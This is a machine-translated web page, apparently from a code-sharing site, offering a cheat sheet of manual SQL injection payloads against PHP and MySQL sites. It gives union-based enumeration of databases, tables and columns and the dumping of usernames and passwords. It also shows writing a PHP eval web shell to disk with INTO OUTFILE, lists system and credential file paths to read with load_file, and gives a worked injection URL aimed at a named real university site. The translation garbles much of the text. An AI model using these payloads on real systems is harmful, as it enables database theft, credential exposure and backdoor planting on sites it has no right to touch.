Of Stack

PHP+MySQL manual injection statement daquan recommended

  • 2020-03-31 16:46:14
  • OfStack

Burst field length

The Order by num / *


Match the field

And 1=1 union select 1,2,3,4,5...... N / *


Burst field location

And 1=2 union select 1,2,3,4,5... . N / *


Explodes database information with built-in functions

Version () database () the user ()    

No need to guess the available field database information (some sites do not apply):

And 1=2 union all select version() /*

And 1=2 union all select database() /*

And 1=2 union all select user() /*

Operating system information:

And 1=2 union all select @@global.version_compile_os from mysql.user /*

Database permissions:

And ord(mid(user(),1,1))=114 /*

BaoKu (mysql> 5.0)

Mysql 5 + has a built-in library, information_schema, that stores all database and table structure information for Mysql

And 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.schemata limit 0,1

Guess the table

And 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.tables where TABLE_SCHEMA= database (hexadecimal) limit 0,1 (display 1 record) --


Guess field

COLUMN_NAME,5,6,7,8,9,10 from information_schema.columns where TABLE_NAME= table name (hexadecimal) limit 0,1


Suddenly and violently password

And 1=2 Union select 1,2,3, username segment,5,6,7, password segment,8,9 from table name limit 0,1

Advanced usage (one available field displays two data contents) :

Union select 1,2,3concat(username segment,0x3c, password segment),5,6,7,8,9 from table name limit 0,1

Write directly to the horse (Root)

Condition: 1. Know the physical path of the site

            2. Have sufficient permissions (select... .from mysql.user test)

            3, magic_quotes_gpc () = OFF

Select    '< ? PHP eval ($_POST [CMD])? > '    Into outfile 'physical path'

And 1=2 union all select HEX into outfile 'path'


Load_file () common path:


1, the replace (the load_file (0 x 2 f6574632f706173737764), 0 x 3 c, 0 x 20)
2, the replace (the load_file (char (47101116,99,47,112,97,115,115,119,100)), the char (60), char (32))
The above two are to see the full display code in a PHP file. Replacement with "space" returns a web page. The code cannot be viewed.
3, load_file(char(47)) can list FreeBSD,Sunos system root directory
4, /etc tpd-conf tpd.conf or /usr/local/apche/conf tpd.conf view the Linux APACHE virtual host configuration file
5, c:\Program Files\Apache Group\Apache\conf \httpd.conf or c:\ Apache\conf \httpd.conf view WINDOWS Apache Files
6, c: / Resin - 3.0.14 / conf/Resin conf    View JSP development site resin file configuration information.
7, c: / Resin/conf/Resin conf          / usr/local/resin/conf/resin. The conf view JSP virtual host Linux system configuration
8, d: \ APACHE \ Apache2 \ conf \ HTTPD. Conf
9, C: \ Program Files \ mysql \ my ini
10,.. /themes/darkblue_orange/layout. Inc. PHP phpmyadmin has exploded
11, c:\ Windows \system32\inetsrv\ metabase.xml view the virtual host configuration file for IIS
12. /usr/local/resin-3.0.22/conf/resin. Conf view the resin configuration file of 3.0.22
13. /usr/local/resin-pro-3.0.22/conf/resin. Conf, ibid
14, / usr/local/app/apache2 / conf/extra TPD - vhosts. Conf APASHE virtual host view
15. /etc/sysconfig/iptables
16, usr/local/app/php5 b/php.ini PHP equivalent Settings
17. /etc/my.cnf MYSQL configuration file
18, / etc/redhat - release    The system version of red hat
19, C:\mysql\data\mysql\user.MYD exists in the mysql system user password
20, /etc/sysconfig/network-scripts/ifcfg-eth0 view IP.
21. /usr/local/app/php5 b/php.ini //PHP
22, / usr/local/app/apache2 / conf/extra TPD - vhosts. Conf / / virtual site Settings
23, C: \ \ Program Files\RhinoSoft.com Serv -u \ ServUDaemon ini
24, c: \ Windows \ my ini
            25, c: \ boot. Ini

Config. Inc. PHP, config. PHP. Replace (load_file(HEX),char(60),char(32))

Note:

Char (60) said <

Char (32) represents a space

Problems with manual injection:

After injection, the page displays:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

Such as: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 20 and 13% % % % 201 = 2% 20 union select 20, 201, the load_file (0 x433a5c626f6f742e696e69), 3, 4, the user % 20 ()

This is due to inconsistent coding,

Solution: just add unhex before the parameter. The URL above can be changed to:

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php? ID = 20 and 13% % % % 201 = 2% 20 union select 20 201, unhex (hex (the load_file (0 x433a5c626f6f742e696e69))), 3, 4, unhex (hex (user ())) % 20

You can continue to inject...

Related articles: